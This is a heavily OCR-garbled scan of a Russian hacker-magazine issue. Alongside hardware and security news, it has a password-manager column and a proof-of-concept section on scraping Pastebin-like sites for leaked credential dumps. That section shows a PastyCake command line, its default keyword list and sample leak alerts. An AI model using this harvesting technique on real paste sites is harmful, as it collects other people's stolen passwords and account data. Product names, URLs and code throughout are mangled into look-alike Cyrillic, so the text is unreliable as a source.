Ыпк (МНІ) для подключения смартфонов и планшетных 
ПК. Устройство поддерживает эксклюзивную технологию 
Ваппзипд Маіигаі СоІогЕхрегІ, квозможностям которой 
относится аппаратная калибровка цветов. 527В970 
способен отображатьболее миллиарда оттенков, что 
гарантируетвысокий реализм и качество при отображе- 
нии фотографий и видеороликов, сделанных с помощью 
цифровой фото- или видеокамеры. Кстати, пресс-релиз 
обещает, что инженеры Ваппзипд вручную будутна- 
страивать цветопередачу каждого монитора серии 9 
на окончательном этапе сборки. Кроме того, вся площадь 
дисп л ея также снабжена антибликовым стеклянным (!) 
покрытием. Да -да, старое доброе стекло с антибликом, 
давненько мы такого не видели. Этот последний нюанс 
должен особенно обрадоватьтех, чьи глаза чувствитель- 
ны ктакназываемому«кристаллическомуэффекту» (он 






же«эффектмокройтряпки»), который часто проявляется 
даже у топовых современных дисп леев. Та к как «кристал- 
лический эффект» напрямую обусловлен матовостью па- 
нели, у глянцевых мониторов он фактически отсутствует. 
Здесьстоитзаметить, что и первые образцы на базе Р15 
вызвали немалое оживлениеутех, для кого прежде всего 
важно комфортное для глаз изображение, все по той же 
причине: Р15-дисплеи с матовым экраном практически 
не проявляли «кристаллическогоэффекта». 

Ожидается, что новинка поступитв продажууже в мар- 
тетекущего года (ксожалению, неизвестно, появится ли 
она также и в России). Ориентировочная цена 527В970 
составит$1199. 



Разрешение: 2560x1440 
Глубина цвета: 1,07 млн цветов 
Яркость: 300 кд/м2 
Равномерность (мин.):90% 
Контрастность (статическая): 
1000:1 

Время отклика (6Т6): 5 мс 
Угол обзора (гор/верт.): 178®/178® 



ЭТА МУЗЫКА БУДЕТ ВЕЧНОЙ. ПАТЕНТНЫЕ ВОЙНЫ ПРОДОЛЖАЮТСЯ 




АРРІЕ ОБВИНЯЕТ ЗАМБЦНе 
ЕЬЕСТКОНІСБ В ТОМ, ЧТО ЧЕХЛЫ 
ДЛЯ ПЛАНШЕТА ОАЬАХУТАВ 10.1 
И СМАРТФОНОВ (!) НАРУШАЮТ ЕЕ 
ПАТЕНТЫ 
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#Ьаскег1;\л/ее1;5 




а ОКоККоІІез: 

Написал новый блог-пост: поиск 
багов в виртуальной машине 
с помощью «Доказателя тео- 
рем» — Иир://Ьі 1 :.Іѵ/ 2 Ід 25 К . 

Комментарий: 

Не фаззингом единым... те, кто инте- 
ресуется методами поиска уязвимостей, 
обратите внимание на это. 



Н Комментарий: 

РиЬу-скрипт для скана «шар» с учет- 
кой гостя... 





I 




газІерИеп^еѵѵег: 

Открыл порцию исходников моей 
системы фаззинга для браузеров 
■ргіпсіег' — Иир://ЬіЕІѵ/хгІІВіѴѴ. 



■ Гаготап_5о!«: 

Не знал о ВіпБсоре: 
Ііир://ЬіІ.Іѵ/ѵ2сОУР . Полезна для 
обнаружения бинарников без 
МХ, ЗаІ'еЗЕН, /сІупатісЬазе, и т. д. 
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МЕ6АМЕѴѴ5 



В СЕТИ В ВИДЕ ТЕКСТОВОГО ФАЙЛАоказались данные о шести миллионах пользователей крупнейшей в КНР компании— 

разработчика сетевого ПО (СБОМ). 



МИНИСТРСВЯЗИ ПОСЕТИЛ 
СОБРАНИЕ ПИРАТСКОЙ ПАРТИИ 

ПАРАДОКСАЛЬНО, НО ЭТО СОБЫТИЕ ИМЕЛО МЕСТО В РОССИИ 



В500ВѴѴІМ00ѴѴ5 7 

ЛЕГКИМДВИЖЕНИЕМ 

РУКИ 




в ходе беседы со Ще- 
голевым выясни- 
лось, что в целом он 
поддерживаетидею 
открытыхданных, 
но декларацию от- 
крытого государства 
как-то «не оценил». 
Кстати, официаль- 
ныхкомментариев 
поповодупри- 
сутствия главы Мин- 
комсвязи на встрече 
членов Пиратской 
партиитакине по- 
следовало. 



акизвестно, в России Пиратская партия даже незарегистрирована (нет, 
ребята пытались, но ничего не вышло). Тем не менее, партия регулярно 
проводит собрания, одно из которых состоялось в середине января 
в книжном магазине«Циолковский», который находится вздании Политехниче- 
ского музея. Для всех пришедших на совместный сбор Пиратской партии, Фонда 
развития электронной демократии и рабочей группы «ИГ протестныхдействий» 
стало полной неожиданностью появление в магазине Игоря Щеголева, мини- 
стра связи и массовыхкоммуникаций РФ. Председатель партии Павел Рассудов 
пишет в своем ЖЖ: «Министр сделал вид, как будто зашел в выходной купить 
пару книг и ничего не знал о намеченном собрании. Присутствующие на встрече 
программеры сразу накинулисьна Щеголева. Ещебы! Не каждый деньесть 
возможность высказать все что думаешь в лицо министру связи. Аупрограмми- 
стовбылочтоемусказать. :) Но министрдержался молодцом, говорил складно, 
однако не сказал ничего конкретного. Сразу видно — большой опыт работы 
в аппарате». Щеголев ответил на ряд вопросов, зада иных участниками собра- 
ния. В частности, рассказал, чтоза год-полтора в России можетбытьвведена 
система электронного голосования, однако общество, по мнению министра, 
пока не испытываетпотребности атакой системе. Подробности вЖЖПавла 
Рассѵдова: ѵѵеЬроІіиіѵе]оигпаІ.сопп/72397.ЬіппІ . 



НАЙДЕНА КРИТИЧЕСКАЯ ДЫРКА В ^^СЕМЕРКЕ» 

нформация о новой незакрытой критической 
уязвимости в ѴѴіпсІоѵѵз 7 х64 впервые появилась 
в Твиттере известного хакера ѵѵЗЬбЗѵіІ. Ба г был 
обнаружен в файле операционной системы ѵѵіпЗЗк. вуз 
(неоднократный виновник критических ошибок в ѴѴіпХР), 
который содержит зависящую от ядра часть пользова- 
тельского интерфейса и относящуюся кнему инфраструк- 
туру. Заметим, что 32-битная версия ОС не восприимчива 
к ошибке, ВТО время как 64-битная «Семерка» может 
не только уйти из-за нее в В500, ной позволяет внедрить 
в машину вредоносный код на уровне ядра. Однако самый 
интересный нюансзаключается в другом: прототип кода, 
демонстрирующего, как вызывать данный сбой, уже утек 
в Сеть. Оказалось, что это простой НТМІ-скрипт. Егоза- 
пуск в браузере ЗаІ'агі быстро приведет к ошибке страни- 
цы на неопределенном участке памяти, и машина покажет 
«синий экран смерти». Этот скрипт представляет собой 
всего л ишь тег іі^гате с чрезвычайно большим атрибутом 
высоты. Уязвимости точно подвержена 64-битная версия 
ѴѴіпсІоѵѵз 7, однако, какотмечаютэксперты, могутбыть 
скомпрометированы и другие системы. Патча наданный 
момент не существует. 






ЫФІИХ 



«ВИНЧЕСТЕРНЫЙ^^ ГИГАНТ 

— компания Беадаіе — 
приобрела подразделение 
компании Батзипд по про- 
изводству жестких дисков. 
Сумма сделки составила 
$1,375млрд. 



Н6ІНХВЫШЕЛНАВТ0Р0Е 
МЕСТО по числу обслужи- 
ваемых активных сайтов, 
обогнав Місго5о!і МБ. Подан- 
ным компании МеіСга^І, 
на первом месте пока АрасИе 
(57,93%). 



ТНЕРІРАТЕВАѴБОЛЬ- 
ШЕНЕБУДЕТХРАНИТЬ 
ТОРРЕНТ-ФАЙЛЫ и полно- 
стью перейдет на тадпеі- 
ссылки. Теперь тадпеМІРІ 
предлагаются для загрузки 
поумолчанию. 



ТОРРЕНТРРЕАК СООБ- 
ЩАЕТ, что Сгузіз 2 стала 
самой скачиваемой через 
ВііТоггепІ игрой для РС 
в 2011 году. Следом идут СаІІ 
о! Оиіу: Мобегп ѴѴаг^аге 3 
и ВаиіеПеИЗ. 



МЕДИАМАГНАТ РУПЕРТ 
МЕРДОКзавел ТѵѵіНег и с его 
помощьютут же обвинил 
боодіе в поддержке пират- 
ства. В боодіе спокойно на- 
звали обвинение чушью. 
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СООСІЕ НАТРИ ГОДА ПРОДЛИЛА СОГЛАШЕНИЕ С М02ІІІАоб использовании своего поисковика в качестве основного для Ріге^ох. 



БОЛЬШЕ КОЛОНОК, ХОРОШИХ 
И РАЗНЫХ 

СРЕДНИЙ ЦЕНОВОЙ СЕГМЕНТ И НЕИЗМЕННО ВЫСОКОЕ КАЧЕСТВО. 
КОНЕЧНО, ЭТО ЕОІПЕВ 




итайская компания ЕсІіЛегпредставила в этом 
месяце сразу две новых модели. Обе новинки по- 
полнили топовую линейку систем 2.0. 

Первое аудио- решение — колонки Р1500ТМ с про- 
фессиональным микрофонным входом, который имеет 
независимый регулятор громкости. Новинка можетпохва- 
статьсятрадиционным для ЕсІіЛегдеревянным корпусом 
(что гарантирует отсутствие резонансов), НЧ-динамиками 
с магнитным экранированием и 18-мм шелковыми ку- 
полообразными твитерами. Стереосигнал, подаваемый 
на входные разъемы РСА, обрабатывается схемой дина- 
мического повышения высоких частот, которая специаль- 
но разработана для мультимедиа. 

Вторая новика — двухполосные колонки Р900Т.Эта 
акустическая 2.0-система, оснащенная4-дюймовыми 
НЧ-динамиками и 13-мм шелковыми куполообразными 
твитерами, хорошо воспроизводит глубокий, богатый 
басизвонкиевысокиечастоты. Габариты Р900Т весьма 
скромны: 140х226х 197 мм. Колонки легко подключить 
квыбранным источникам сигнала черезЗ,5-мм стереовход 
РСАили РСАна РСА, которыеспособны принятьиусилить 
сигнал, поступающий с любого источниказвука, и обеспе- 
читьвысокое качествозвучания. 



Пара интересных 
фактов: на заводах 
компании ЕсІіПег 
производится более 
12 млн комплектов 
мультимедийных 
колонокв год. За- 
воды расположены 
натрехконтинен- 
тах. Научно- 
исследовательским 
центром компании 
руководит всемирно 
известный инженер 
и дизайнерФил 
Джонс. 



ПОВСЕМЕСТНАЯ АВТОМАТИЗАЦИЯ 



по АДРЕСУ МЕ6А5ЕАКСН.СС 
ЗАРАБОТАЛ АГРЕГАТОР 
КАРДЕРСКИХ МАГАЗИНОВ, 
то ЕСТЬ РЕСУРС для 
ПОИСКА ВОРОВАННЫХ 
БАНКОВСКИХ КАРТ 



МІСР050РТ, КОНКУРЕНТЫ 
ИАРМ-СИСТЕМЫ 

О НЕ ВСЕГДА ЧЕСТНОЙ БОРЬБЕ ЗА МЕСТО ПОД 
СОЛНЦЕМ 



ще в конце прошлого года компания МісгозоН 
сделала заявление, которое породило у многих 
нехорошие подозрения. Напомним, о чем идет речь. 
В конце 201 1-го компания МісгозоН впервые озвучила, что 
ѴѴіпсІоѵѵз 8 будеттребовать Зесиге Ьооі для загрузки (то есть 
обязательной активации режима безопаснойзагрузки 
СІЕРІ). Эта функция работаеттак: СІЕРІ сохраняет «секретные 
ключи»вОС. Все, чтохочетзагрузиться на компьютер, кпри- 
меру операционная система, использует эти ключи для до- 
ступа к ІІЕРІ. Если в ОС не прописан соответствующий ключ, 
она не получит разрешение на загрузку. Ыпих-сообщество 
уже тогда попыталосьдонести до производителей, что 
реализоватьпередачу ключей в Ыпихбудеточеньсложно, 
из-за чего установить Ыпих на заточенные под ѴѴіпсІоѵѵз 8 
устройства станетпрактически невозможно. 

Однако МісгозоІ'І корректно пояснила, что не имеет 
ничего против Ыпих и других открытых ОС, и сражается 
отнюдь не с конкурентами, а с вредоносными кодами. Мол, 
безопаснаязагрузкатем ихороша для работы ѴѴіпсІоѵѵз, что 
такой процессперекрываетещеодин канал проникновения 
вредоносных программ. Надо признать, вы глядит все это 
действительно логично. 

Но теперь МісгозоН подготовила документ с требова- 
ниями, которые необходимо выполнить для сертификации 
компьютеров на совместимостьсѴѴіпсІоѵѵз8. Бумага, увы, 
подтверждаетхудшие опасения. Здесь лучше всего про- 
цитировать. 

Официальное руководство для производителей, желаю- 
щих получить сертификацию ѴѴіпсІоѵѵз 8 для своих устройств, 
страница 116: «В системах, не относящихся к АРМ, необходи- 
мо реализовать возможность отключения Зесиге Вооі через 
интерфейсустановки прошивки. Физически присутствую- 
щий пользовательдолжен иметьвозможностьотключить 
Зесиге Вооі через интерфейсустановки, не владея Ркргіѵ. 
ПрограммноеотключениеЗесигеВооІ средствами ОЕРІ 
не должно быть возможно ни во время загрузки, ни по ее 
окончании». 

Получается, заявление МісгозоН отом, что она не бу- 
деттребовать от производителей «железа» запретить 
откл ючение Зесиге Вооі, на деле распространял осьтолько 
на традиционные ПК, но не на АРМ-устройства. Произво- 
дители систем, базирующихся на архитектуре АРМ, теперь 
не должны предоставлять ни каких способов отключения 
безопаснойзагрузки. Именно этот момент — обязательная 
безопаснаязагрузка — ставитЫпих(и нетолько) взатруд- 
нительное положение. Фактически это означает, что теперь 
для «загружаемости» на одной из таких машин, сертифици- 
рованныхна совместимостьсѴѴіпсІоѵѵзЗ, соответствующий 
дистрибутив Ыпихдолжен иметьсертифицированные крип- 
тоключи от конкретного изготовителя компьютера. Встает 
резонный вопрос: где их взять? Если выдачей ключей будут 
заниматься производители, то разработчикам дистрибу- 
тивов придется отдельно контактироватьс каждым из них. 

И если огромная корпорация можетсебетакое позволить, 
толинуксоидамэтоврядли окажется под силу. Централи- 
зованного органа сертификации, который бы формировал 
ключи для режима безопаснойзагрузки ІІЕРІ, несуществует. 

Словом, похоже, МісгозоЙ пытается бороться далеко 
нетолькосмалварью, ной с установкой Ыпих, АпбгоісІ и дру- 
гих открытых ОС на АРМ-системы. 
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МЕ6АМЕѴѴ5 



КАРСТЕН НОЛ ИЗЗЕСиРІТУ РЕ5ЕАРСН 1АВ5 нашел очереднуюуязвимость в 65М. Подробности он пока не разглашает. 



СКАЧАЙ И РАСПЕЧАТАЙ! 



ПИРАТИТЬ ЧЕРЕЗ СЕТЬ МОЖНО НЕ ТОЛ ЬКО ИНФОРМАЦИЮ, 
НО И ВПОЛНЕ РЕАЛ ЬНЫЕ ОБЪЕКТЫ 




0-принтеры медленно, но верно про- 
бираются на потребительский рынок. 
Уже сейчастакой девайс (к примеру, 
японскую іМосІеІа) можно приобрести за пару 
тысяч долларов, и это будет именно «домашний» 
вариант, а не жуткий промышленный станок не- 
вообразимых размеров. С каждым днем об этих 
трехмерныхчудесахпрогресса появляется все 
больше статей, постов, дискуссий. А раз интерес 
и спрос растут, появляется и предложение. 

Еще прошлой осенью на торрент-трекере 
ТЬе Рігаіе Вау открылся раздел с программами 
для 30-принтеров, но какая-тоактивность 
наметилась там тол ЬКО сейчас. Добрые люди 
наконец-то начали делиться как программами, 
таки реальными объектами. Уже сейчас в этом 
разделе можноскачатьпластмассового робота 
из вселенной ѴѴагЬатппег40К или хот-род- 
модельшевроле 1970 года. Ноэтобезобидные 
игрушки, а ведь в Сети уже некоторое время цир- 
кулируют слухи отом, что на черном рынке тор- 
гуют и 30-моделями скиммеров для банкоматов. 
Естьдаже подтверждения тому, что мошенники 
действительно пользуются такими моделями! 
Нет, в «Бухте» они пока не всплывали, но это 
явно вопрос времени. Похоже, у правоохрани- 
тельных органов по всему миру скоро появится 
еще одна головная боль. 





Одним из наиболее 
известныхпро- 
ектовпоЗО-печати 
является РерРар 
—открытый проект 
по созданию принте- 
ров, способных 
воспроизводить 
себя. Новейшая 
модель называется 
МепсІеІ, и собрать 
ееспособенлюбой 
желающий (это 
действительно не- 
сложно). Стоимость 
всехкомпонентов 
составляетвсего 
$520. 



РѴѴМ20ѴѴМ МЕНЯЕТ 
ПРАВИЛА 

ПОПУЛЯРНЫЙ КОНКУРС в этом году ПРОЙДЕТ в новом 
ФОРМАТЕ 




ыуженеразрас- 
сказывалитебе 
озамечательномха- 
керском конкурсе Рѵѵп20ѵѵп, 
участники котороголомают 
самый разный софтижеле- 
30, а потом уносят с собой 
хакнутыетрофеи (железные, 
конечно же) в качестве при- 
зов. Сообщаем, что в этом 
году правила соревнования 
изменились. Теперь в кон кур- 
сеучаствуюттолько МісгозоЙ 
Іпіегпеі Ехріогег, АррІеБаі'агі, 
Соодіе СЬготе и Мо 2 ІІІа 
Ріге^охдля операционныхси- 
стем ѴѴіпсІоѵѵБ 7 и Мае 05 Ыоп 
(последние версии со все- 
ми патчами). Мобильные 
девайсы на конкурсе больше 
взламывать не будут. 

Главным спонсором объявле- 
на компания НеѵѵІеи-РаскагсІ. 
Три победителя получат денежные призы в размере 60 тысяч, 30 
тысяч и 15 тысяч долларов плюс трофеи в виде ноутбуков стой самой 
системой, которую им удастся взломать. 

Компания Соодіетакжеучредила дополнительные призы 
за взлом браузера СЬготе. Она обещаетзаплатить20тысяч долла- 
ров за исполнениезапсІЬох-кода с использованием одной только 
уязвимости в СЬготе. В Ютысяч долларов оценивается исполнение 
запсІЬох-кода с использованием уязвимостей какв СЬготе,таки в 
операционной системе. 

Но самое главное, что в этом году изменятся сами правила 
Рѵѵп20ѵѵп. Взломанная система теперь не исключается из состя- 
зания, как раньше. Все остальные участники имеют возможность 
в течение трех конкурсных дней взламывать ее своими методами. 
Соответственно, результат соревнования теперь подсчитывается 
по очкам. 

В этом году Рѵѵп20ѵѵп пройдете 7 по 9 марта. Не забывай, что в кон- 
курсе можноучаствоватьи вудаленном режиме! 




К0МПАНИЯ50МУПРЕД- 
СТАВИЛА КАРТЫ ПАМЯТИ 

собственного формата ХОО. 
Ориентированы они как 
на профессиональныхфото- 
графов,таки наэнтузиастов. 

В режимах чтения\записи 
пропускная способностьХОО 
достигает 1 Гбит/с (125 Мб/с). 
Продажи уже начались. Карта 
00-Н16 объемом ІбГбстоит 
$130,00-Н32на32Гб — $230. 
Также представлены и устрой- 
ства для работы с новым 
форматом. 




ДВАДЦАТЬ ВОСЬМОГО 
ЯНВАРЯ СТАРТОВАЛ ВТОРОЙ 
РАСЕВООКНАСКЕЯСОР, 
который проводится еже- 
годно. Лучшихждет поездка 
в штаб-квартиру РасеЬооІс, 
апобедительполучитпять 
тысячдолларов. 




КОМПАНИЯ ТІ0ВЕ50РТШЯЕ 
УДОСТОИЛАОВ^ЕСТIVЕ-С 
ЗВАНИЯ <<ЯЗЫКГ0ДА>^. 
Однако на первом месте 
по популярноти по-прежнему 
стоит ^аѵа, а за ней идут С, 
С#иС++. 
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У5УМАМТЕСУКРАЛИ 
ИСХОДНЫЕ КОДЫ 
АНТИВИРУСА 



ХАКЕРЫДИСКРЕДИТИРОВАЛИ ПОПУЛЯРНОГО ВЕНДОРА 



од давлением хакеров компания Зутапіес, являющаяся 
одним из самых известных в мире поставщиков решений 
в сфере информационной безопасности, была вынуждена 
признать, что хакерам удал ось получить доступ кисходному коду це- 
лого ряда ее продуктов. По словам представителей Зутапіес, входе 
расследования былоустановлено, что кража исходного кода анти- 
вирусов произошла еще в 2006 году. После этого компания ввела ряд 
мердляусиления безопасности, чтобы не допустить повторения по- 
добных инцидентов в будущем. Хакерам уда л ось похитить исходные 
коды таких продуктов, как Могіоп Апііѵігиз Согрогаіе Есііііоп, Могіоп 
Іпіегпеі Зесигііу, Могіоп ЗузІеппѴѴогкБ и рсАпуѵѵЬеге версий 12.0, 

12.1 и 12.5. Об утечке стало известно в середине прошлого месяца, 
когда некий хакер Уата ТоидЬ, причисляющий себя и к «Анонимам», 
и кхакерской группировке ІогсІ о1" ОЬагтага]а, написал вТвиттере, 
что располагает исходникам и Могіоп ІЛіІіІіез. В доказательство он 
выложил ссылки на небольшой документсописанием программно- 
го интерфейса сервиса для создания описаний образцов вирусов, 
а затем и список файлов, содержащихся в архиве с исходным кодом 
Могіоп Апііѵігиз. Опубликованный документ, кстати, датируется 
апрелем 1999 года. Конечно же, Вуітіапіес сразу сообщила, что 
информация из этого документа не может навредить нынешним 
продуктам компании. Затоархивсисходным кодом компания непро- 
комментировала. 

По заявлениям самих хакеров, информацию им удалось выудить 
с серверов ведомства военной разведки Индии. Иными словами, 
утечка произошла не из сетей самой Зутапіес (хотьэто радует). 

По некоторым да иным, ха ктивисты опубликовали имеющуюся у них 
информацию, чтобы помочьсудебному разбирательству, которое 
недавно началось в США. Десятого января против Зутапіес было 
выдвинуто обвинение в том, что она продвигает свою продукцию 
с помощьютакназываемыхзсагеѵѵаге-программ, которые запугива- 
ют пользователей, извещая их о возможных проблемах с безопасно- 
стью в особенно назойливой форме. 

Несмотря на все заявления Зутапіес, что у хакеров оказались 
старые данные, которые не могут нанести никакого вреда, раз- 
работчикиуже начали выпускать патчи. Компания предпочитает 
перестраховаться, внезависимости оттого, откуда именно «утекла» 
информация и насколько она актуальна на данный момент. 



МЫ ЛЕГИОН: ИСТОРИЯ ХАКТИВИСТОВ 



ПРОФЕССИОНАЛЬНЫЕ 
ДОКУМЕНТАЛИСТЫ 
ИЗ КИНОКОМПАНИИ 
ШМІНАНТМЕОІА СНЯЛИ 
93-МИНУТНЫЙ ФИЛЬМ 
О ВЕЛИКИХ И УЖАСНЫХ 

Анонумоиз 



Электронная книга с доступом в Интернет 

Читай. Смотри. Слушай. 




Удобный доступ к бесплатным книгам 
5ТОКЕ и популярные новинки. 

Скачивайте и читайте на \л/\л/\л/.\л/ех1ег.ги! 




«МЕТРО 2033» ДМИТРИЯ ГЛУХОВСКОГО и ЕЩЕ 
ДВА РОМАНА КУЛЬТОВОЙ СЕРИИ БЕСПЛАТНО 
В ЭТОЙ ЭЛЕКТРОННОЙ КНИГЕ ѴѴЕХСЕЯ 
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КОЛОНКА СТЕПЫ ИЛЬИНА 




ОХРАНЕНИИ ПАРОЛЕЙ 



ВЫБОР РЕШЕНИЯ 

Использовать один и тотже пароль для всех 
сервисов сразу — одна из самых серьезных 
ошибок пользователей. Но и удержать в голове 
огромное количество уникальных пассов — 
задача явно непосильная. Я долго пытался 
приучить себя к использованию менеджеров 
паролей вроде КеуРазз ( кееразз.іпі'о ). но 
из этого так ничего и не вышло. Открывать 
программу, чтобы искать там нужный пароль 
— явно не самое удобное, что можно приду- 
мать. Да и локальное хранилище, в котором 
находятся зашифрованные пароли, попахивает 
архаизмом — не таскать же его на флешке? :) 
Короче говоря, я решил попробовать решения, 
которые так же, как и КеуРазз, помогали бы 
генерировать уникальные пароли и сохранять 
их, но вдобавок автоматически использо- 
вали бы их в браузере! Вариантов тут не так 
много. Среди специализированных решений 
наиболее раскрученной оказалась программа 
ІРаззѵѵогсІ [ адіІеЬіІз.сот/операззѵѵогсІ ]. кото- 
рая изначально появилась для Мае, но позже 
была портирована и для ѴѴіпбоѵѵз. Продукт 
очень качественный, но отдавать $69.99 за 
кроссплатформенную версию мне показалось 
слишком. Тем более сегодня, когда практиче- 
ски для всего можно найти бесплатную альтер- 
нативу. Таковая, в общем-то, действительно 
быстро нашлась — ей стал замечательный 
сервис ІазіРазз ( Іазіразз.сот ), на котором я и 
остановился. Очень кратко о причинах, почему 
я выбрал его. Во-первых, сервис универсален 
и работает под любой ОС (ѴѴіпбоѵѵз, Ыпих, Мае), 
что было для меня важным критерием. Он 
имеет плагины для всех популярных браузе- 
ров (Рігеі'ох, Іпіегпеі Ехріогег, СЬготе, Ваі'агі, 
Орега). А платным подписчикам ($1 в месяц) 
доступны также версии для популярных 
мобильных ОС. Во-вторых, ІазіРазз делает 
ровно то, что от него требуется — автомати- 
чески предлагает сохранить пароли и данные 
форм, а затем подставляет их при следующем 
посещении страницы. Если аккаунтов для 
какого-то сайта несколько, то можно быстро 
переключиться с одного на другой. А если 
для какого-то кривого сайта данные автома- 
тически не парсятся, то это легко исправить 
вручную. В-третьих, ІазіРазз хранит зашифро- 
ванные пароли в облаке, поэтому хранилище 
с паролями не надо носить с собой на флешке 



или извращаться с его синхронизацией через 
тот же самый ОгорЬох. Доступ к хранилищу 
защищен мастер-ключом (сложным паролем), 
который в целях безопасности невозможно 
восстановить. Будь осторожен! :) 

НЕКОТОРЫЕ ФИШКИ 1А5ТРА55 

Я не буду рассказывать о том, как использо- 
вать ІазіРазз, — там все элементарно. Но не 
могу не поделиться с тобой несколькими по- 
лезными фишками, которые меня порадовали. 

Проверка надежности паролей 

Один только факттого, что пароли хранятся 
в надежном хранилище, не делает их по- 
настоящему безопасными. ІазіРазз с твоего 
разрешения может сделать быстрый анализ 
пассов, легко отыскав среди них простые и от- 
кровенно слабые (вроде «123456»). В програм- 
му встроен бенчмарк, который высчитывает 
показатель надежности всех паролей, — ре- 
зультат можно сравнить с показателями других 
пользователей в специальном рейтинге. 

Одноразовые пароли 

Многих, вероятно, смутит возможность до- 
ступа к паролям с помощью одного только 
мастер-ключа. Нет проблем! На флешку можно 
записать специальную утилиту ІазіРазз 
Безаппе (есть версии под любые ОС), которая, 
по сути, превращает накопитель в токен. Если 




ІазІРазз работаетналюбыхустройствахи ОС 



активировать в аккаунте ІазіРазз одноразо- 
вые пароли, то войти без такого токена будет 
уже невозможно. Каждый раз будет необхо- 
димо вставить флешку, запустить Безаппе и 
использовать сгенерированный программой 
пароль вместе со своим мастер-ключом. 

Только в этом случае можно будет добраться до 
хранилища. По отдельности что мастер-ключ, 
что флешка с Безате ценности для злоумыш- 
ленника уже не представляют. 

Двухфакторная авторизация через Соодіе 

Для авторизации ты также можешь купить 
настоящий токен — например УиЫкеу за $25 
( зІоге.уиЬісо.соіп ). — а можешь воспользовать- 
ся уже готовым решением от Соодіе. Напомню, 
что система от поискового гиганта предлагает 
установку на смартфон специального прило- 
жения (Соодіе АиіЬепІісаІог), которая в каждый 
момент времени генерирует уникальный одно- 
разовый ключ. Так как я постоянно пользуюсь 
этой системой для входа в СтаіІ, то я тут же 
настроил ее и для защиты ІазіРазз. Подроб- 
ную инструкцию можно найти на официальном 
сайте (Ь. -.■Ч .ім ■■.ч' м ' п 

доодІе-аиіЬепІісаІог ). 

Справедливости ради стоит отметить, что 
одноразовые пароли и двухфакторная автори- 
зация доступны только платным подписчикам. 
Но $12 в год — не такая уж большая плата за 
надежное хранение паролей. 



Зідп іп Іо СтаіІ жі(Н уоиг 

Соѵ)§1е Ассоипі 

Узетяте: [іриаег 

Рэзд№і'ог(І: I*** 

□ Біѳу зідпе(1 іп 
8>дп іп^ 



О 

□ 



Сігц ісесм ѵеиг айсаипі:? 
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" РгооІ-оі'-СопсерІ: 

Ш СОБРАТЬ ИНТЕРЕСНЫЕ ДАННЫЕ 

^ С РА5ТЕВІН.С0М И ПОДОБНЫХ СЕРВИСОВ 



ХОСТИНГ ТЕКСТА 

Максимально быстро и удобно расшарить лю- 
бой текстовый файл — такова миссия извест- 
ного онлайн-сервиса РазІеЫп.сопп. Создатели 
изначально рассчитывали, что их проектом 
будут активно пользоваться программисты, 
которые легко смогут выкладывать на этом 
ресурсе любые исходники с подсветкой синтак- 
сиса. И так вначале и было. Но чего они точно 
не могли ожидать, так это бешеной популярно- 
сти сервиса у хакеров. Вспомни все последние 
истории с взломами от Анонимов и Іиігзес 
— почти всегда для публикации конфиденци- 
альных данных (к примеру, дампов паролей) ис- 
пользовался именно РазІеЬіп.сопп. За примером 
далеко ходить не нужно. Среди наиболее по- 
пулярных на текущий момент записей ( разІеЬіп. 
сотЛгепсІз ] несложно заметить, к примеру: 

• дамп каких-то учеток с РасеЬоок; 

• внутреннюю базу данных какого-то взломан- 
ного сайта, включая е-таіГы пользователей 

и хеши их паролей; 

• листинг ІР-адресов с привязкой к конкретным 
организациям и компаниям. 




Исходник граббера на РуІЬоп 



Такая популярность ресурса легко объ- 
яснима: каждый может опубликовать на нем 
любые данные вообще без регистрации. При 
этом записи не проходят никакой премодера- 
ции и тутже оказываются в Сети. Моментально. 
Руководство, конечно, удаляет противозакон- 
ный контент по первому запросу правообла- 
дателя или пострадавшей стороны, но к этому 
времени он уже успевает расползтись по Сети. 
Это, в общем, история не только про РазІеЬіп. 
сот, но и про другие похожие сервисы: 

Разііе, РгиЬагРазІе, УоигРазІе, СоберасІ, ЗІеху 
и ІосІдеІС Идея сегодняшнего РоС — автомати- 
ческий сбор «интересных» данных с подобных 
ресурсов. Иными словами, надо реализовать 
инструмент, обходящий записи и по некоторым 
ключевым словам собирающий большую базу 
данных «интересного» контента. 

СБОР ДАННЫХ 

Идея, на самом деле, не новая. В Сети можно 
найти немало написанных на коленке сценари- 
ев: например, от таІсОбе ( ЬіСІѵ/АпббУсІ ] или 
МеопТетрезІ ( ЬіСІу/гРиКУо І. Но лучшей реа- 
лизацией затеи, пожалуй, является сценарий 
РазІуСаке от исследователя 9Ь+ ( ЬіСІѵ/хНХсІЖ ). 
который он опубликовал совсем недавно. 
Скрипт позволяет изящно обходить записи 
на хостингах РазІеЬіп.сот и Разііе.огд и леги- 
ровать все записи, используя базу ключевых 
слов. Результаты сохраняются в текстовом 
файле или базе данных ЗОЫіе. В ближайшем 
времени дополнительно появится поддержка 
МопдоОВ и МуЗОІ. Поскольку сценарий на- 




Раздел «Тгепсііпд Разіез» — что качают чаще всего? 



писан на РуіЬоп, то запускается всё из команд- 
ной строки: 

ру1:Ііоп §а1;Ііег.ру -к кыогсіз -о игІз.сІЬ \ 
-а ~^^раз1;усаке@§таі1. сот~" Ііагѵезі; 

Ключ ’ЬагѵезС включает режим сбора 
данных. Отчеты о найденных данных будут 
отправляться на указанный е-таіі. Опция 
«-о»используется для выбора файла для 
вывода. А ключ «-к» позволяет задать базу 
ключевых слов, на которые будет реагировать 
граббер. Вообще, настроить кейворды — это, 
пожалуй, самое главное. Например, упо- 
мянутые выше сценарии были максимально 
адаптированы для поиска дампов с учеткам 
пользователей, логов чата, информации о кре- 
дитных картах и банковских аккаунтов. Список 
ключевых слов, используемых по умолчанию 
в РазІуСаке, прямо скажем, невелик: 

0ЕРАиіТ_КЕУ1лІ0К05 = [ 

' раззыогсі ' . 

' Ьаск' . 

] 

Но даже этого вполне достаточно, чтобы 
проверить, как идея реализована на практике. 
Дальше всё зависит от твоей фантазии. 

РАЗВИТИЕ ИДЕИ 

Интересно, что в Сети даже есть целые ресур- 
сы, которые периодически обходят контент 
таких хостингов и публикуют интересные 
ссылки с соответствующей классификацией. 

К примеру, исследователь Джейм Бласко ве- 
дет Тѵѵіиег-ленту РазІеЫпІеакз ( іѵѵіиег.сот/#!/ 
РазіеЫдІеакз), где его робот-парсер автомати- 
чески публикует записи вроде 

Ро ззі Ые Маззіѵе таіі/разз Іеак 
: //разІіеЬіп . сот/16УЬ0136 
РоззіЫе 1І5І;іп§ о-Р Іі1;1;р раззыогсіз 
Іі1;1;р : //разіеЬіп . сот/д2ЬссМВ7 
РоззіЫе Зипірег сопб^игаііоп ыіііі 
раззыогсі Іі1:1:р : //разіеЬіп . сот/9ѵиы2дп5 



Справедливости ради стоит сказать, что 
в последнее время апдейты прекратились. ^ 
